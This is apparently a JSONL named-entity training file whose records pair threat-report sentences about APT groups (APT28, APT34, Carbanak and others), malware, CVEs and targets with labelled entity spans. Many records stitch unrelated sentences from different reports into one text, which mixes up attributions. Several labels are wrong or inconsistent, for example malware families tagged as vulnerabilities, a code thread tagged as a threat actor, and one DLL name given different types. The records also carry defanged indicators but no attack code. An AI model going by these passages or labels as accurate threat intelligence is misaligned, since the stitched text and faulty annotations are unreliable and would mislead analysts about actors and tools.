{"text": "The stolen data includes : Contacts ( stored both on the phone and the SIM card ) . During the past few months , APT34 has been able to quickly incorporate exploits for at least two publicly vulnerabilities ( CVE-2017-0199 and CVE-2017-11882 ) to target organizations in the Middle East . NEODYMIUM is an activity group that is known to use a backdoor malware detected by Microsoft as Wingbird .", "spans": {"THREAT_ACTOR: APT34": [[113, 118]], "VULNERABILITY: CVE-2017-0199": [[209, 222]], "VULNERABILITY: CVE-2017-11882": [[227, 241]], "THREAT_ACTOR: NEODYMIUM": [[289, 298]], "ORGANIZATION: Microsoft": [[372, 381]], "MALWARE: Wingbird": [[385, 393]]}, "info": {"id": "cyberner_stix_train_005007", "source": "cyberner_stix_train"}}
{"text": "'' As was the case with HummingBad , the purpose of HummingWhale is to generate revenue by displaying fraudulent ads and automatically installing apps . These tools often lay the groundwork for further malicious activity , such as the targeting of antivirus capabilities and the disabling of firewalls , both of which are very fundamental defensive measures . Custom malware used by the group include : Two threat clusters used Mimikatz for dumping process memory .", "spans": {"MALWARE: HummingBad": [[24, 34]], "MALWARE: HummingWhale": [[52, 64]], "TOOL: Mimikatz": [[428, 436]]}, "info": {"id": "cyberner_stix_train_005008", "source": "cyberner_stix_train"}}
{"text": "On September 19 , 2019 , we observed the same exact Mimikatz variant uploaded to a webshell hosted at another government organization in a second country in the Middle East .", "spans": {"TOOL: Mimikatz": [[52, 60]]}, "info": {"id": "cyberner_stix_train_005009", "source": "cyberner_stix_train"}}
{"text": "We also provide an update on shifts in the group ’s tool development and use , and summarize the tactics APT28 employs to compromise its victims .", "spans": {"THREAT_ACTOR: APT28": [[105, 110]]}, "info": {"id": "cyberner_stix_train_005010", "source": "cyberner_stix_train"}}
{"text": "FireEye has moderate confidence that a campaign targeting the hospitality sector is attributed to Russian actor APT28 .", "spans": {"ORGANIZATION: FireEye": [[0, 7]], "THREAT_ACTOR: APT28": [[112, 117]]}, "info": {"id": "cyberner_stix_train_005011", "source": "cyberner_stix_train"}}
{"text": "We believe the creator of this delivery document chose to run the payload from the dropped file as an evasion technique .", "spans": {}, "info": {"id": "cyberner_stix_train_005012", "source": "cyberner_stix_train"}}
{"text": "Hide Icon Figure 3 : Code showing the hiding icon and starting service . The Buckeye attack group was using Equation Group tools to gain persistent access to target organizations at least a year prior to the Shadow Brokers leak . The threat actors utilizing this toolset have repeatedly demonstrated their expertise in compromising Windows based environments .", "spans": {"THREAT_ACTOR: Buckeye": [[77, 84]], "TOOL: Equation Group tools": [[108, 128]], "SYSTEM: Windows": [[332, 339]]}, "info": {"id": "cyberner_stix_train_005013", "source": "cyberner_stix_train"}}
{"text": "PIVY also played a key role in the 2011 campaign known as Nitro that targeted chemical makers , government agencies , defense contractors , and human rights groups.10,11 Still active a year later , the Nitro attackers used a zero-day vulnerability in Java to deploy PIVY in 2012 . Moreover , they used the same exploit kit Niteris as that in the Corkow case .", "spans": {"TOOL: PIVY": [[0, 4], [266, 270]], "ORGANIZATION: chemical makers": [[78, 93]], "ORGANIZATION: government agencies": [[96, 115]], "ORGANIZATION: defense contractors": [[118, 137]], "THREAT_ACTOR: attackers": [[208, 217]], "VULNERABILITY: zero-day vulnerability": [[225, 247]], "VULNERABILITY: exploit": [[311, 318]], "VULNERABILITY: kit Niteris": [[319, 330]], "MALWARE: Corkow": [[346, 352]]}, "info": {"id": "cyberner_stix_train_005014", "source": "cyberner_stix_train"}}
{"text": "When enabled , it makes a screenshot every 25 seconds nggstart_key nggstop_key Enable/disable keylogging module nggstart_rec nggstop_rec Enable/disable surrounding sounds recording module ngg_status Send components status to the C & C socket * any other * Execute received command via Python ’ s subprocess.Popen ( ) , output result will be sent to the C & C socket . After app installation , whenever SWAnalytics senses victims opening up infected applications or rebooting their phones , it silently uploads their entire contacts list to Hangzhou Shun Wang Technologies controlled servers . The group is made up of actors who likely speak Russian .", "spans": {"SYSTEM: Python": [[285, 291]], "MALWARE: SWAnalytics": [[402, 413]]}, "info": {"id": "cyberner_stix_train_005015", "source": "cyberner_stix_train"}}
{"text": "In our Revoke-Obfuscation white paper , first presented at Black Hat USA 2017 , we provide background on obfuscated PowerShell attacks seen in the wild , as well as defensive mitigation and logging best practices . The group has its origin in more common financial fraud including theft from consumer and corporate bank accounts in Europe and Russia , using standard banking malware , mainly Carberp .", "spans": {"ORGANIZATION: Black Hat": [[59, 68]], "ORGANIZATION: consumer": [[292, 300]], "MALWARE: Carberp": [[392, 399]]}, "info": {"id": "cyberner_stix_train_005016", "source": "cyberner_stix_train"}}
{"text": "The attackers stole organizations' SSL certificates associated with security appliances such as ASA to obtain VPN credentials , allowing the actors to gain access to the targeted network . This was the case in two known intrusions in 2015 , where attackers named the implant DLL \" ASPNET_FILTER.DLL \" to disguise it as the DLL for the ASP.NET ISAPI Filter .", "spans": {"THREAT_ACTOR: attackers": [[4, 13]], "TOOL: ASA": [[96, 99]], "TOOL: DLL": [[275, 278], [323, 326]], "FILEPATH: ASPNET_FILTER.DLL": [[281, 298]], "FILEPATH: ASP.NET ISAPI Filter": [[335, 355]]}, "info": {"id": "cyberner_stix_train_005017", "source": "cyberner_stix_train"}}
{"text": "Trojan.Zekapab is a downloader component that is capable of carrying out basic reconnaissance functions and downloading additional malware to the infected computer .", "spans": {"FILEPATH: Trojan.Zekapab": [[0, 14]]}, "info": {"id": "cyberner_stix_train_005018", "source": "cyberner_stix_train"}}
{"text": "Figure 8 – Android requirements Android malware has been around for many years and will be with us for the foreseeable future . While the group used watering hole attacks in 2013 , it's still unclear how victims get redirected to the exploitation kits in the new 2014-2015 attacks . This shows that the actor is still very active and constantly trying to elaborate its attack tools . Compromised websites ( WordPress appears to be the top target ) are injected with a code snippet that replaces the current webpage with the aforementioned fake updates templates .", "spans": {"SYSTEM: Android": [[11, 18], [32, 39]], "SYSTEM: Compromised websites": [[384, 404]], "ORGANIZATION: WordPress": [[407, 416]]}, "info": {"id": "cyberner_stix_train_005019", "source": "cyberner_stix_train"}}
{"text": "This may imply the “ Concipit1248 ” app is still incubating . The GCMAN group used an MS SQL injection in commercial software running on one of bank 's public web services , and about a year and a half later , they came back to cash out . In this case , When the marital infidelity website AshleyMadison.com learned in July 2015 that hackers were threatening to publish data stolen from 37 million users , the company ’s then - CEO Noel Biderman was quick to point the finger at an unnamed former contractor .", "spans": {"THREAT_ACTOR: GCMAN group": [[66, 77]], "ORGANIZATION: bank": [[144, 148]], "ORGANIZATION: AshleyMadison.com": [[290, 307]], "ORGANIZATION: Noel Biderman": [[432, 445]], "ORGANIZATION: unnamed former contractor": [[482, 507]]}, "info": {"id": "cyberner_stix_train_005020", "source": "cyberner_stix_train"}}
{"text": "This is a form of anti-analysis as Word will not fully execute the malicious code until the user closes the document .", "spans": {"TOOL: Word": [[35, 39]]}, "info": {"id": "cyberner_stix_train_005021", "source": "cyberner_stix_train"}}
{"text": "We warned our clients of new features suggesting an increased focus on European targets - though verification of targets was not possible at the time . We have reasons to believe that the operators of the APT28 network are either Russian citizens or citizens of a neighboring country that speak Russian .", "spans": {"THREAT_ACTOR: operators": [[188, 197]], "THREAT_ACTOR: APT28": [[205, 210]], "ORGANIZATION: citizens": [[238, 246], [250, 258]]}, "info": {"id": "cyberner_stix_train_005022", "source": "cyberner_stix_train"}}
{"text": "The command then uses the certutil application to convert the base64 encoded data ( T1132 ) in the cmd.txt file to c.aspx in three different SharePoint related folders .", "spans": {"FILEPATH: cmd.txt": [[99, 106]], "FILEPATH: c.aspx": [[115, 121]], "TOOL: SharePoint": [[141, 151]]}, "info": {"id": "cyberner_stix_train_005023", "source": "cyberner_stix_train"}}
{"text": "Traces of its previous uses in the wild were found inside the configuration file : It was configured to use a Command-and-control ( C & C ) server in the United States ; however , the server was bought from a host service provider and is now unavailable . Carbanak is a backdoor used by the attackers to compromise the victim . The original code is separated into the orange-colored “ first block ” An internal data defense strategy requires prevention , detection and response capabilities .", "spans": {"MALWARE: Carbanak": [[256, 264]], "TOOL: backdoor": [[270, 278]], "THREAT_ACTOR: attackers": [[291, 300]]}, "info": {"id": "cyberner_stix_train_005024", "source": "cyberner_stix_train"}}
{"text": "Following we can see an example of a connection to port 6209 which is used to extract data from the Telegram app . Blackfly began with a campaign to steal certificates , which were later used to sign malware used in targeted attacks . Contains the above mentioned document , as well as photos of the assemblies and political cartoons criticizing Hamas 50a597aa557084e938e2a987ec5db99187428091e8141e616cced72e6a39de1b . Cisco Duo provides multi - factor authentication for users to ensure only those authorized are accessing your network .", "spans": {"SYSTEM: Telegram": [[100, 108]], "THREAT_ACTOR: Blackfly": [[115, 123]], "FILEPATH: 50a597aa557084e938e2a987ec5db99187428091e8141e616cced72e6a39de1b": [[352, 416]], "TOOL: Cisco Duo": [[419, 428]]}, "info": {"id": "cyberner_stix_train_005025", "source": "cyberner_stix_train"}}
{"text": "Always apply critical thinking and consider whether you should give a certain app the permissions it requests . This was the case in two known intrusions in 2015 , where attackers named the implant DLL \" ASPNET_FILTER.DLL \" to disguise it as the DLL for the ASP.NET ISAPI Filter . While this particular actor effectively used their almost worn out CVE-2012-0158 exploits in the past , Spring Dragon employs more involved and creative intrusive activity as well .", "spans": {"MALWARE: ASPNET_FILTER.DLL": [[204, 221]], "MALWARE: ASP.NET ISAPI Filter": [[258, 278]], "THREAT_ACTOR: actor": [[303, 308]], "VULNERABILITY: CVE-2012-0158": [[348, 361]], "THREAT_ACTOR: Spring Dragon": [[385, 398]]}, "info": {"id": "cyberner_stix_train_005026", "source": "cyberner_stix_train"}}
{"text": "Due to new EU money laundering guidelines , the new Bank Austria security app is mandatory for all customers who have a mobile phone number in our system . This redirection allowed the attackers to harvest credentials of administrators who manage domains with the TLD of Saudi Arabia (.sa) . Poseidon Group is a Portuguese-speaking threat group that has been active since at least 2005 .", "spans": {"ORGANIZATION: EU": [[11, 13]], "SYSTEM: Bank Austria security app": [[52, 77]], "THREAT_ACTOR: attackers": [[185, 194]], "THREAT_ACTOR: Poseidon Group": [[292, 306]]}, "info": {"id": "cyberner_stix_train_005027", "source": "cyberner_stix_train"}}
{"text": "Once inside the network of a hospitality company , APT28 sought out machines that controlled both guest and internal Wi-Fi networks .", "spans": {"THREAT_ACTOR: APT28": [[51, 56]], "TOOL: Wi-Fi networks": [[117, 131]]}, "info": {"id": "cyberner_stix_train_005028", "source": "cyberner_stix_train"}}
{"text": "China Chopper is a tool that allows attackers to remotely control the target system that needs to be running a web server application before it can be targeted by the tool . Some examples of the files used in the email attachment include the following :", "spans": {"MALWARE: China Chopper": [[0, 13]], "THREAT_ACTOR: attackers": [[36, 45]], "TOOL: email": [[213, 218]]}, "info": {"id": "cyberner_stix_train_005029", "source": "cyberner_stix_train"}}
{"text": "This infamous RAT has been associated with many different Chinese threat actors , including APT10 , APT1 , and DragonOK . For example , the actors behind FrozenCell used a spoofed app called Tawjihi 2016 , which Jordanian or Palestinian students would ordinarily use during their general secondary examination .", "spans": {"TOOL: RAT": [[14, 17]], "THREAT_ACTOR: threat actors": [[66, 79]], "THREAT_ACTOR: APT10": [[92, 97]], "THREAT_ACTOR: APT1": [[100, 104]], "THREAT_ACTOR: DragonOK": [[111, 119]], "MALWARE: FrozenCell": [[154, 164]], "MALWARE: Tawjihi 2016": [[191, 203]], "ORGANIZATION: students": [[237, 245]]}, "info": {"id": "cyberner_stix_train_005030", "source": "cyberner_stix_train"}}
{"text": "One might argue that since this took place after the exploits were publicly mentioned , the Dukes simply copied them .", "spans": {"THREAT_ACTOR: Dukes": [[92, 97]]}, "info": {"id": "cyberner_stix_train_005031", "source": "cyberner_stix_train"}}
{"text": "de.postbank.finanzassistent pl.bph de.comdirect.android com.starfinanz.smob.android.sfinanzstatus de.sdvrz.ihb.mobile.app pl.ing.mojeing com.ing.mobile pl.ing.ingksiegowosc com.comarch.security.mobilebanking com.comarch.mobile.investment.ing com.ingcb.mobile.cbportal de.buhl.finanzblick pl.pkobp.iko pl.ipko.mobile pl.inteligo.mobile de.number26.android PROMETHIUM and NEODYMIUM both used an exploit for CVE-2016-4117 , a vulnerability in Adobe Flash Player that , at the time , was both unknown and unpatched . The complex infection chain begins with a weaponized Office document named “ f.doc ” . Schools , colleges , and universities must somehow reconcile tight budgets with the need to deploy a sophisticated enough detection and response capability to find and evict stealthy adversaries like Vice Society .", "spans": {"THREAT_ACTOR: PROMETHIUM": [[355, 365]], "THREAT_ACTOR: NEODYMIUM": [[370, 379]], "VULNERABILITY: CVE-2016-4117": [[405, 418]], "TOOL: Office": [[566, 571]], "FILEPATH: f.doc": [[589, 594]], "ORGANIZATION: Schools": [[599, 606]], "ORGANIZATION: colleges": [[609, 617]], "ORGANIZATION: universities": [[624, 636]], "THREAT_ACTOR: Vice Society": [[799, 811]]}, "info": {"id": "cyberner_stix_train_005032", "source": "cyberner_stix_train"}}
{"text": "Upon creation the class will start to take screenshots that will be stopped and uploaded to the C2 once the service ca n't find the targeted applications running . they have been last known to employ malware in February 2016 . Research into this HIGHTIDE campaign revealed APT12 targeted multiple Taiwanese Government organizations between August 22 and 28 . APT29 has also used legitimate web services such as Dropbox and Constant Contact in their operations .", "spans": {"MALWARE: HIGHTIDE": [[246, 254]], "THREAT_ACTOR: APT12": [[273, 278]], "ORGANIZATION: Taiwanese Government": [[297, 317]], "THREAT_ACTOR: APT29": [[359, 364]]}, "info": {"id": "cyberner_stix_train_005033", "source": "cyberner_stix_train"}}
{"text": "One of the favorite methods used by the Pitty Tiger group to infect users is to use a Microsoft Office Word document which exploits a specific vulnerability ( CVE-2012-0158 ) . Perhaps the most worrying discovery we made was that Thrip had targeted a satellite communications operator .", "spans": {"THREAT_ACTOR: Pitty Tiger group": [[40, 57]], "MALWARE: Microsoft Office Word document": [[86, 116]], "VULNERABILITY: CVE-2012-0158": [[159, 172]], "ORGANIZATION: satellite communications operator": [[251, 284]]}, "info": {"id": "cyberner_stix_train_005034", "source": "cyberner_stix_train"}}
{"text": "TG-3390 actors keep track of and leverage existing ASPXTool web shells in their operations , preferring to issue commands via an internally accessible web shell rather than HttpBrowser or PlugX .", "spans": {"THREAT_ACTOR: TG-3390": [[0, 7]], "TOOL: ASPXTool": [[51, 59]], "TOOL: web shells": [[60, 70]], "TOOL: web shell": [[151, 160]], "MALWARE: HttpBrowser": [[173, 184]], "MALWARE: PlugX": [[188, 193]]}, "info": {"id": "cyberner_stix_train_005035", "source": "cyberner_stix_train"}}
{"text": "Later , they were also associated with botnet IDs 7200 and 7500 .", "spans": {}, "info": {"id": "cyberner_stix_train_005036", "source": "cyberner_stix_train"}}
{"text": "Dropping Cluster Bombs RCSAndroid is a threat that works like a cluster bomb in that it deploys multiple dangerous exploits and uses various techniques to easily infect Android devices . Existing telemetry indicates that the Carbanak attackers are trying to expand operations to other Baltic and Central Europe countries , the Middle East , Asia and Africa . The value of the variable is assigned to a specific register in each block then compared in a control flow dispatcher and other condition blocks . The initial payloads and second stage backdoors were removed from the system .", "spans": {"MALWARE: RCSAndroid": [[23, 33]], "SYSTEM: Android": [[169, 176]], "VULNERABILITY: Carbanak": [[225, 233]], "THREAT_ACTOR: attackers": [[234, 243]]}, "info": {"id": "cyberner_stix_train_005037", "source": "cyberner_stix_train"}}
{"text": "That finally started to change in 2013 .", "spans": {}, "info": {"id": "cyberner_stix_train_005038", "source": "cyberner_stix_train"}}
{"text": "HammerDuke is a set of backdoors that was first seen in the wild in February 2015 , while SeaDuke is a crossplatform backdoor that was , according to Symantec , first spotted in the wild in October 2014 .", "spans": {"MALWARE: HammerDuke": [[0, 10]], "MALWARE: SeaDuke": [[90, 97]], "ORGANIZATION: Symantec": [[150, 158]]}, "info": {"id": "cyberner_stix_train_005039", "source": "cyberner_stix_train"}}
{"text": "For now , that is the only way how cybercriminals can profit from Triada , but don ’ t forget that it ’ s a modular Trojan , so it can be turned into literally everything on one command from the C & C server . Instead of Flash exploits , older Wild Neutron exploitation and watering holes used what was a Java zero-day at the end of 2012 and the beginning of 2013 , detected by Kaspersky Lab products as Exploit.Java.CVE-2012-3213.b . Less than a week after Microsoft issued a patch for CVE-2017-11882 on Nov. 14 , 2017 , FireEye observed an attacker using an exploit for the Microsoft Office vulnerability to target a government organization in the Middle East .", "spans": {"MALWARE: Triada": [[66, 72]], "VULNERABILITY: Flash exploits": [[221, 235]], "VULNERABILITY: Java zero-day": [[305, 318]], "ORGANIZATION: Kaspersky Lab": [[378, 391]], "VULNERABILITY: Exploit.Java.CVE-2012-3213.b": [[404, 432]], "ORGANIZATION: Microsoft": [[458, 467]], "VULNERABILITY: CVE-2017-11882": [[487, 501]], "ORGANIZATION: FireEye": [[522, 529]], "THREAT_ACTOR: attacker": [[542, 550]], "VULNERABILITY: exploit": [[560, 567]], "TOOL: Microsoft Office": [[576, 592]], "ORGANIZATION: government organization": [[619, 642]]}, "info": {"id": "cyberner_stix_train_005040", "source": "cyberner_stix_train"}}
{"text": "They have taken interest in subject matter of direct importance to the Democratic People's Republic of Korea (DPRK) such as Korean unification efforts and North Korean defectors . First observed in mid-2014 , this malware shared code with the Bugat ( aka Feodo ) banking Trojan .", "spans": {"THREAT_ACTOR: They": [[0, 4]], "MALWARE: Bugat": [[243, 248]], "MALWARE: Feodo": [[255, 260]], "ORGANIZATION: banking": [[263, 270]], "MALWARE: Trojan": [[271, 277]]}, "info": {"id": "cyberner_stix_train_005041", "source": "cyberner_stix_train"}}
{"text": "After successful execution , Downeks returns the results to the C2 S-TOOL server .", "spans": {"MALWARE: Downeks": [[29, 36]], "TOOL: C2 S-TOOL server": [[64, 80]]}, "info": {"id": "cyberner_stix_train_005042", "source": "cyberner_stix_train"}}
{"text": "Moreover , there is a special handler for the accelerometer that is able to calculate and log the device ’ s speed : This feature is used in particular by the command “ tk0 ” that mutes the device , disables keyguard , turns off the brightness , uses wakelock and listens to device sensors . In this analysis , we observed the return of HIDDEN COBRA 's Bankshot malware implant surfacing in the Turkish financial system . APT33 : ae1d75a5f87421953372e79c081e4b0a929f65841ed5ea0d380b6289e4a6b565 S-SHA2 Remcos . Neither France or Germany have been spared by the growing menace of ransomware , either .", "spans": {"THREAT_ACTOR: HIDDEN COBRA": [[337, 349]], "TOOL: Bankshot malware": [[353, 369]], "THREAT_ACTOR: APT33": [[422, 427]], "MALWARE: ae1d75a5f87421953372e79c081e4b0a929f65841ed5ea0d380b6289e4a6b565 S-SHA2 Remcos": [[430, 508]], "MALWARE: ransomware": [[579, 589]]}, "info": {"id": "cyberner_stix_train_005043", "source": "cyberner_stix_train"}}
{"text": "A cybersecurity company focusing on protecting industrial control systems .", "spans": {"ORGANIZATION: A cybersecurity company focusing on protecting industrial control systems": [[0, 73]]}, "info": {"id": "cyberner_stix_train_005044", "source": "cyberner_stix_train"}}
{"text": "Correlating these bytes to the standard configuration of Poison Ivy , we can observe the following :", "spans": {"VULNERABILITY: Poison Ivy": [[57, 67]]}, "info": {"id": "cyberner_stix_train_005045", "source": "cyberner_stix_train"}}
{"text": "Active since at least 2013 , TEMP.Periscope has primarily focused on maritime-related targets across multiple verticals , including engineering firms , shipping and transportation , manufacturing , defense , government offices , and research universities . As in the past , these messages have been sent accounts believed to be fake and accounts compromised by Infy , including Kurdish activists that had previously been compromised by the Flying Kitten actor group .", "spans": {"THREAT_ACTOR: TEMP.Periscope": [[29, 43]], "ORGANIZATION: engineering firms": [[132, 149]], "ORGANIZATION: shipping": [[152, 160]], "ORGANIZATION: transportation": [[165, 179]], "ORGANIZATION: manufacturing": [[182, 195]], "ORGANIZATION: defense": [[198, 205]], "ORGANIZATION: government offices": [[208, 226]], "ORGANIZATION: research universities": [[233, 254]], "ORGANIZATION: Kurdish activists": [[378, 395]], "THREAT_ACTOR: Flying Kitten actor group": [[440, 465]]}, "info": {"id": "cyberner_stix_train_005046", "source": "cyberner_stix_train"}}
{"text": "We were able to identify that 8,929 files had been exfiltrated from compromised devices and that the overwhelming majority of these , 97 percent , were highly likely encrypted images taken using the device camera . We suspect the Kazuar tool may be linked to the Turla threat actor group ( also known as Uroburos and Snake ) , who have been reported to have compromised embassies , defense contractors , educational institutions , and research organizations across the globe . It sets the service status to RUNNING and finally calls the ShellMain function of ZxShell . This campaign has a multi - stage attack chain that begins with a phishing email delivered to victims impersonating CoinPayments , a legitimate global cryptocurrency payment gateway .", "spans": {"TOOL: Kazuar tool": [[230, 241]], "THREAT_ACTOR: Uroburos": [[304, 312]], "THREAT_ACTOR: Snake": [[317, 322]], "ORGANIZATION: embassies": [[370, 379]], "ORGANIZATION: defense contractors": [[382, 401]], "ORGANIZATION: educational institutions": [[404, 428]], "ORGANIZATION: research organizations": [[435, 457]], "MALWARE: ZxShell": [[559, 566]]}, "info": {"id": "cyberner_stix_train_005047", "source": "cyberner_stix_train"}}
{"text": "Some of the apps we discovered resided on Google Play for several years , but all were recently updated . We assess with high confidence that the Winnti umbrella is associated with the Chinese state intelligence apparatus , with at least some elements located in the Xicheng District of Beijing . The thread KeyloggerThread is spawned and is responsible for doing keylogging on the target workstation . None Use of Python for malware development and/or packaging : We expect to continue to observe attackers compiling or packaging their OT malware via methods such as PyInstaller ( IRONGATE ) or Py2Exe ( TRITON ) given the proliferation of OT malware developed or packaged using Python in recent years .", "spans": {"SYSTEM: Google Play": [[42, 53]], "THREAT_ACTOR: KeyloggerThread": [[308, 323]], "TOOL: Python": [[415, 421], [680, 686]], "THREAT_ACTOR: attackers": [[498, 507]], "MALWARE: OT malware": [[537, 547], [641, 651]], "TOOL: PyInstaller": [[568, 579]], "MALWARE: IRONGATE": [[582, 590]], "TOOL: Py2Exe": [[596, 602]], "MALWARE: TRITON": [[605, 611]]}, "info": {"id": "cyberner_stix_train_005048", "source": "cyberner_stix_train"}}
{"text": "They most commonly target Brazilian merchants , though others use the same tactics to exploit entities outside Brazil . Targeted sectors of Molerats include governmental and diplomatic institutions , including embassies ; companies from the aerospace and defence Industries ; financial institutions ; journalists ; software developers .", "spans": {"THREAT_ACTOR: They": [[0, 4]], "THREAT_ACTOR: Molerats": [[140, 148]], "ORGANIZATION: governmental": [[157, 169]], "ORGANIZATION: embassies": [[210, 219]], "ORGANIZATION: aerospace": [[241, 250]], "ORGANIZATION: defence Industries": [[255, 273]], "ORGANIZATION: financial institutions": [[276, 298]], "ORGANIZATION: journalists": [[301, 312]], "ORGANIZATION: software developers": [[315, 334]]}, "info": {"id": "cyberner_stix_train_005049", "source": "cyberner_stix_train"}}
{"text": "And finally , as every elephant , Babar has big ears and the malware is able to listen to conversations and log them by using the dsound and winmm libraries . It is possible that CVE-2017-8759 was being used by additional actors .", "spans": {"TOOL: Babar": [[34, 39]], "TOOL: dsound": [[130, 136]], "TOOL: winmm libraries": [[141, 156]], "VULNERABILITY: CVE-2017-8759": [[179, 192]], "THREAT_ACTOR: actors": [[222, 228]]}, "info": {"id": "cyberner_stix_train_005050", "source": "cyberner_stix_train"}}
{"text": "We identified file creation times for numerous files that TEMP.Veles created during lateral movement on a target ’s network .", "spans": {}, "info": {"id": "cyberner_stix_train_005051", "source": "cyberner_stix_train"}}
{"text": "From their high volume 0day deployment to their innovative and broad malware set , Sofacy is one of the top groups that we monitor , report , and protect against . 2017 was not any different in this regard .", "spans": {"VULNERABILITY: 0day": [[23, 27]], "THREAT_ACTOR: Sofacy": [[83, 89]]}, "info": {"id": "cyberner_stix_train_005052", "source": "cyberner_stix_train"}}
{"text": "Our investigation revealed an attack where the GCMAN group then planted a cron script into bank 's server , sending financial transactions at the rate of $200 per minute . Whenever users reboot their device or open up Network Speed Master , SWAnalytics will fetch the latest configuration file from http[:]//mbl[.]shunwang[.]com/cfg/config[.]json” .", "spans": {"THREAT_ACTOR: GCMAN group": [[47, 58]], "ORGANIZATION: bank": [[91, 95]], "FILEPATH: SWAnalytics": [[241, 252]]}, "info": {"id": "cyberner_stix_train_005053", "source": "cyberner_stix_train"}}
{"text": "For instance , Russian operators , such as Sandworm Team , have compromised Western ICS over a multi-year period without causing a disruption . Volgmer payloads have been observed in 32-bit form as either executables or dynamic-link library ( .dll )", "spans": {"THREAT_ACTOR: Sandworm": [[43, 51]], "MALWARE: Volgmer": [[144, 151]], "TOOL: dynamic-link library": [[220, 240]], "FILEPATH: .dll": [[243, 247]]}, "info": {"id": "cyberner_stix_train_005054", "source": "cyberner_stix_train"}}
{"text": "A short , constant string of characters is inserted at strategic points to break up keywords : At runtime , the delimiter is removed before using the string : API OBFUSCATION SMS and toll fraud generally requires a few basic behaviors ( for example , disabling WiFi or accessing SMS ) , which are accessible by a handful of APIs . Deepen told Threatpost the group has been operating since at least since 2008 and has targeted China and US relations experts , Defense Department entities , and geospatial groups within the federal government . ZXHttpServer Run a custom HTTP server . In the case of the exploit method described here as OWASSRF , the endpoint is not used , in lieu , and the request will not be dropped .", "spans": {"ORGANIZATION: Deepen": [[331, 337]], "ORGANIZATION: China and US relations experts": [[426, 456]], "ORGANIZATION: Defense Department": [[459, 477]], "ORGANIZATION: geospatial groups": [[493, 510]], "ORGANIZATION: federal government": [[522, 540]]}, "info": {"id": "cyberner_stix_train_005055", "source": "cyberner_stix_train"}}
{"text": "] comakashipro [ . In order to initially compromise the designated targets , the attackers typically distributed specifically-crafted malicious documents containing Infy through spearphishing attacks . About half of APT1 ’s known zones were named according to three themes : news , technology and business . It even can restrict forms to be sent only to specific hosts , using the form - action directive .", "spans": {"TOOL: Infy": [[165, 169]], "THREAT_ACTOR: APT1": [[216, 220]]}, "info": {"id": "cyberner_stix_train_005056", "source": "cyberner_stix_train"}}
{"text": "After compromising an initial victim's system ( patient 0 ) , the threat actors use the Baidu search engine to search for the victim's organization name .", "spans": {"ORGANIZATION: Baidu": [[88, 93]]}, "info": {"id": "cyberner_stix_train_005057", "source": "cyberner_stix_train"}}
{"text": "The addition of mobile threat defense into these capabilities means that Microsoft Defender for Endpoint ( previously Microsoft Defender Advanced Threat Protection ) now delivers protection on all major platforms . Unit 42 researchers have been tracking Gorgon Group for criminal and targeted attacks . The modified tool was tested with an ANEL 5.4.1 payload dropped from a malicious document with the following hash ( previously reported by FireEye ) : The malware is designed to steal browser cookies and take advantage of authenticated Facebook sessions to steal information from the victim 's Facebook account and ultimately hijack any Facebook Business account that the victim has sufficient access to .", "spans": {"SYSTEM: Microsoft Defender": [[73, 91]], "SYSTEM: Microsoft Defender Advanced Threat Protection": [[118, 163]], "ORGANIZATION: Unit 42": [[215, 222]], "THREAT_ACTOR: Gorgon Group": [[254, 266]], "MALWARE: ANEL": [[340, 344]], "ORGANIZATION: FireEye": [[442, 449]], "MALWARE: malware": [[458, 465]]}, "info": {"id": "cyberner_stix_train_005058", "source": "cyberner_stix_train"}}
{"text": "It is possible that CVE-2017-8759 was being used by additional actors . March by security researchers from Kaspersky Labs .", "spans": {"VULNERABILITY: CVE-2017-8759": [[20, 33]], "THREAT_ACTOR: actors": [[63, 69]], "ORGANIZATION: Kaspersky Labs": [[107, 121]]}, "info": {"id": "cyberner_stix_train_005059", "source": "cyberner_stix_train"}}
{"text": "VOODOO BEAR appears to be integrated into an organization that also operates or tasks multiple pro-Russian hacktivist entities . The admin@338 used the popular Poison Ivy RAT and WinHTTPHelper malware to compromise the computers of government officials .", "spans": {"THREAT_ACTOR: VOODOO BEAR": [[0, 11]], "THREAT_ACTOR: admin@338": [[133, 142]], "MALWARE: Poison Ivy RAT": [[160, 174]], "MALWARE: WinHTTPHelper": [[179, 192]], "MALWARE: malware": [[193, 200]], "ORGANIZATION: government officials": [[232, 252]]}, "info": {"id": "cyberner_stix_train_005060", "source": "cyberner_stix_train"}}
{"text": "The Democratic National Committee ’s ( DNC ) June 2016 announcement attributing its network breach to the Russian Government triggered an international debate over Russia ’s sponsorship of information operations against the U.S.", "spans": {"ORGANIZATION: Democratic National Committee": [[4, 33]], "ORGANIZATION: DNC": [[39, 42]]}, "info": {"id": "cyberner_stix_train_005061", "source": "cyberner_stix_train"}}
{"text": "SHA256 f19bc664558177b7269f52edcec74ecdb38ed2ab9e706b68d9cbb3a53c243dec .", "spans": {"FILEPATH: f19bc664558177b7269f52edcec74ecdb38ed2ab9e706b68d9cbb3a53c243dec": [[7, 71]]}, "info": {"id": "cyberner_stix_train_005062", "source": "cyberner_stix_train"}}
{"text": "Finally , since publishing the 9002 blog , Unit 42 has also seen the aforementioned 9002 C2 used as a Poison Ivy C2 with a Myanmar political-themed lure . With the contents of the emails , included links and decoy PDFs all involving taxes , the attackers are apparently targeting the financial departments of organizations in the Balkans region . While Volexity does not typically engage in attempting attribution of any threat actor , Volexity does agree with previously reported assessments that OceanLotus is likely operating out of Vietnam .", "spans": {"MALWARE: 9002": [[31, 35], [84, 88]], "MALWARE: Poison Ivy": [[102, 112]], "THREAT_ACTOR: attackers": [[245, 254]], "ORGANIZATION: financial": [[284, 293]], "ORGANIZATION: Volexity": [[353, 361], [436, 444]], "THREAT_ACTOR: OceanLotus": [[498, 508]]}, "info": {"id": "cyberner_stix_train_005063", "source": "cyberner_stix_train"}}
{"text": "The head of Germany ’s domestic intelligence agency , Bundesamt für Verfassungsschutz ( BfV ) , also attributed the June 2015 compromise of the Bundestag ’s networks to APT28 .", "spans": {"ORGANIZATION: Bundesamt für Verfassungsschutz": [[54, 85]], "ORGANIZATION: BfV": [[88, 91]], "THREAT_ACTOR: APT28": [[169, 174]]}, "info": {"id": "cyberner_stix_train_005064", "source": "cyberner_stix_train"}}
{"text": "The pattern of infrastructure hosting suggests that the group parks its domains when not in use , an operational security technique that limits exposure of the group's overall hosting infrastructure .", "spans": {}, "info": {"id": "cyberner_stix_train_005065", "source": "cyberner_stix_train"}}
